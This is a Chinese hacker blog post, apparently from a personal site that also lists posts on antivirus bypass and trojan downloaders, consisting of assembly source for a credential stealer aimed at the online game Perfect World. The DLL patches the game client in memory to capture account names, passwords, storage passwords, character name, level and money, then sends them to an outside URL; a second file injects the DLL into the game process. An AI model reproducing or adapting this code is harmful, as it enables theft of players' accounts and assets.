-
公告
- 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)
-
写作时间
-
原创下载
-
最新文章
- [04/29]大半个月的上班族
- [04/29]Google 黑客搜索技巧
- [04/23]绕过主动防御 木马病毒刺穿卡巴斯基
- [04/16]老牌社区K666再度易主 续谈当年情
- [04/14]第一天上班。
- [04/14]华夏[破还原-穿主动]完美下载者
- [04/10]第一次应凭。
- [04/08]百度K后重收经验!
- [04/06]Themida & WinLicen V1.9.1.0--V1.9.5.0 系列脱壳脚本.By.fxyang[CUG]
- [04/05]拿站之---郁闷!
- [04/02]新站建立难!
- [03/31]嘿嘿,小说站有进步!
- [03/28]五天来的琐碎片段。
- [03/23]完美世界EXE包含部分代码
- [03/22]完美世界截取和发信部分代码
-
最新评论
-
文章归档
-
Statistics
- 文章总数:154
- 评论总数:47
- 引用总数:0
- 浏览总数:121178
- 留言总数:0
- 当前样式:4u-HK
- 当前语言:zh-CN
-
友情链接
- 反木马在线
- 热门小说网
- 老喜 'S Blog
- 示波器
- 中国电脑论坛
- 交换友情链接请与QQ:287963907联系.审核非违法网站都可通过!
-
反向链接
完美世界截取和发信部分代码
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Dll.asm
; 用来被嵌入到其它进程执行的测试 dll
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 使用 nmake 或下列命令进行编译和链接:
; ml /c /coff DLL.asm
; Link /subsystem:windows /Dll DLL.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include libc.inc
includelib libc.lib
include Wininet.inc
includelib Wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hProcess dd ?
dwMoney dd ?
dwLevel dd ?
dwTemp1 dd ?
hSession dd ?
hRequest dd ?
.data
szBuf db 0,0,0,0,0,0,0,0,0,0
szServer1 db 20 dup ( 0 )
szServer2 db 20 dup ( 0 )
szFileName db 260 dup ( 0 )
szTargetName db 'elementclient.exe',0
szAgent db 'WinInet',0
szUrl db 'http://www.79725.com/wm/lin.asp',0
szMailFmt db '%s?s=%s&u=%s&p=%s&sp=%s&r=%s&l=%d&m=%d',0
szBuf_Url db 260 dup (0)
szUserName db 30 dup ( 0 )
szPassWord db 30 dup ( 0 )
szStoragePW db 30 dup ( 0 )
szPlayerName db 60 dup ( 0 )
szPlayerName1 db 60 dup ( 0 )
.const
szConfirm db 'confirm',0
szUnKnown db 'UnKnown',0
szNum1 db '1',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;szUserName
;szPassWord
;szStoragePW
;szPlayerName
;%s?s=%s&u=%s&p=%s&sp=%s&r=%s&l=%d&m=%d
_SendMail1 proc
invoke InternetOpenA,offset szAgent,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
mov hSession, eax
invoke wsprintf,offset szBuf_Url,offset szMailFmt,offset szUrl,offset szServer1,offset szUserName,offset szPassWord, \
offset szStoragePW,offset szPlayerName1,dwLevel,dwMoney
invoke InternetOpenUrlA, hSession, offset szBuf_Url, 0, 0, INTERNET_FLAG_RELOAD, 0
ret
_SendMail1 Endp
_SendMail2 proc
invoke InternetOpenA,offset szAgent,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
mov hSession, eax
invoke wsprintf,offset szBuf_Url,offset szMailFmt,offset szUrl,offset szServer1,offset szUserName,offset szPassWord, \
offset szUnKnown,offset szPlayerName1, dwLevel, dwMoney
invoke InternetOpenUrlA, hSession, offset szBuf_Url, 0, 0, INTERNET_FLAG_RELOAD, 0
ret
_SendMail2 Endp
;-------------------------------------------------------------------------------
GetStoragePW proc
.if ebx == ebp
mov ebp, offset szConfirm
.if dword ptr [ebx] == 666e6f63h
invoke RtlZeroMemory,offset szStoragePW,sizeof szStoragePW
pushad
mov esi, offset szStoragePW
mov al, [edi]
.while( al )
mov [esi], al
inc edi
inc esi
mov al, [edi]
.endw
popad
invoke CreateThread,NULL,0,offset _SendMail1, NULL, 0, 0
.endif
.endif
ret
GetStoragePW Endp
;金钱:[[[8e4dbc]+1c]+20]+4FC
;等级:[[[8e4dbc]+1c]+20]+448
;名字: [[[[8e4dbc]+1c]+20]+5c8]
GetPlayerInfo proc
mov esi, 08e4dbch
mov esi, [esi]
mov esi, [esi+01ch]
mov esi, [esi+020h]
add esi, 04FCh
mov ebp, [esi]
mov dwMoney,ebp
sub esi, 04FCh
add esi, 0448h
mov ebp, [esi]
mov dwLevel,ebp
sub esi, 0448h
add esi, 05C8h
mov ebp, [esi]
push eax
mov esi, offset szPlayerName
mov ax, [ebp]
.while( ax )
mov [esi], ax
inc ebp
inc esi
mov ax, [ebp]
.endw
mov ebp, 008E5754h
mov esi, offset szServer1
mov ax, [ebp]
.while( ax )
mov [esi], ax
inc ebp
inc esi
mov ax, [ebp]
.endw
;invoke WideCharToMultiByte, CP_ACP, 0, offset szServer1, -1, 0, 0, 0, 0
;invoke WideCharToMultiByte, CP_ACP, 0, offset szServer1, -1, offset szServer2, eax, 0, 0
invoke WideCharToMultiByte, CP_ACP, 0, offset szPlayerName, -1, 0, 0, 0, 0
invoke WideCharToMultiByte, CP_ACP, 0, offset szPlayerName, -1, offset szPlayerName1, eax, 0, 0
invoke CreateThread,NULL,0,offset _SendMail2, NULL, 0, 0
pop eax
pop esi
pop ebp
retn 4
GetPlayerInfo Endp
_SleepThread proc _lParam
invoke Sleep, 600000
mov eax, 1
ret
_SleepThread Endp
GetUserNameAndPassWord proc
push ebp
mov ebp, [esp+0Ch]
mov dwTemp1,ebp
pop ebp
invoke RtlZeroMemory,offset szUserName,sizeof szUserName
invoke RtlZeroMemory,offset szPassWord,sizeof szPassWord
;---------------------------------------------------
pushad
mov ebp, dwTemp1
mov esi, offset szUserName
mov al, [ebp]
.while( al )
mov [esi], al
inc ebp
inc esi
mov al, [ebp]
.endw
popad
;---------------------------------------------------
push ebp
mov ebp, [esp+10h]
mov dwTemp1,ebp
pop ebp
;---------------------------------------------------
pushad
mov ebp, dwTemp1
mov esi, offset szPassWord
mov al, [ebp]
.while( al )
mov [esi], al
inc ebp
inc esi
mov al, [ebp]
.endw
popad
;----------------------------------------------------
retn 01Ch
GetUserNameAndPassWord Endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
DllEntry proc _hInstance,_dwReason,_dwReserved
pushad
.if _dwReason == DLL_PROCESS_ATTACH
invoke MessageBox, NULL, offset szNum1, NULL, MB_ICONINFORMATION
invoke GetModuleFileName, 0, offset szFileName, 0103h
invoke strrchr, offset szFileName, 05Ch
inc eax
invoke _strcmpi, eax, offset szTargetName
.if eax == 0
mov eax, offset szBuf
mov byte ptr [eax], 0E9h
mov ebx, offset GetStoragePW
sub ebx, 00459A29h
mov dword ptr [eax+1], ebx
invoke GetCurrentProcess
mov hProcess, eax
invoke WriteProcessMemory, eax, 00459A24h, offset szBuf, 5, 0
mov eax, offset szBuf
mov ebx, offset GetPlayerInfo
sub ebx, 0044E816h
mov dword ptr [eax+1], ebx
invoke WriteProcessMemory, hProcess, 0044E811h, offset szBuf, 5, 0
mov eax, offset szBuf
mov ebx, offset GetUserNameAndPassWord
sub ebx, 0058B955h
mov dword ptr [eax+1], ebx
invoke WriteProcessMemory, hProcess, 0058B950h, offset szBuf, 5, 0
mov eax, offset szBuf
mov byte ptr [eax], 033h
invoke WriteProcessMemory, hProcess, 00439C74h, offset szBuf, 1, 0
invoke CreateThread,NULL,0,offset _SleepThread,NULL, CREATE_SUSPENDED, 0
.endif
.endif
popad
mov eax,TRUE
ret
DllEntry Endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
End DllEntry
exe
*************************************************
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Load.asm
; 利用远程进程函数将一个 dll 文件嵌入远程进程中执行
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 使用 nmake 或下列命令进行编译和链接:
; ml /c /coff Load.asm
; rc Load.rc
; Link /subsystem:windows Load.obj Load.res
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
dwProcessID dd ?
dwThreadID dd ?
hProcess dd ?
lpLoadLibrary dd ?
lpDllName dd ?
szMyDllFull db MAX_PATH dup (?)
.const
szErrOpen db '无法打开远程线程!',0
szDesktopClass db 'ElementClient Window',0
szDesktopWindow db 'Element Client',0
szDllKernel db 'Kernel32.dll',0
szLoadLibrary db 'LoadLibraryA',0
szMyDll db '\Dll.dll',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
;********************************************************************
; 准备工作:获取dll的全路径文件名、获取LoadLibrary函数地址等
;********************************************************************
invoke GetCurrentDirectory,MAX_PATH,addr szMyDllFull
invoke lstrcat,addr szMyDllFull,addr szMyDll
invoke GetModuleHandle,addr szDllKernel
invoke GetProcAddress,eax,offset szLoadLibrary
mov lpLoadLibrary,eax
;********************************************************************
; 查找文件管理器窗口并获取进程ID,然后打开进程
;********************************************************************
invoke FindWindow,addr szDesktopClass,addr szDesktopWindow
invoke GetWindowThreadProcessId,eax,offset dwProcessID
mov dwThreadID,eax
invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or \
PROCESS_VM_WRITE,FALSE,dwProcessID
.if eax
mov hProcess,eax
;********************************************************************
; 在进程中分配空间并将DLL文件名拷贝过去,然后创建一个LoadLibrary线程
;********************************************************************
invoke VirtualAllocEx,hProcess,NULL,MAX_PATH,MEM_COMMIT,PAGE_READWRITE
.if eax
mov lpDllName,eax
invoke WriteProcessMemory,hProcess,\
eax,offset szMyDllFull,MAX_PATH,NULL
invoke CreateRemoteThread,hProcess,NULL,0,lpLoadLibrary,\
lpDllName,0,NULL
invoke CloseHandle,eax
.endif
invoke CloseHandle,hProcess
.else
invoke MessageBox,NULL,addr szErrOpen,NULL,MB_OK or MB_ICONWARNING
.endif
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
1 Comments , 0 Trackbacks
Jump to comment form | comments rss | Get trackback uri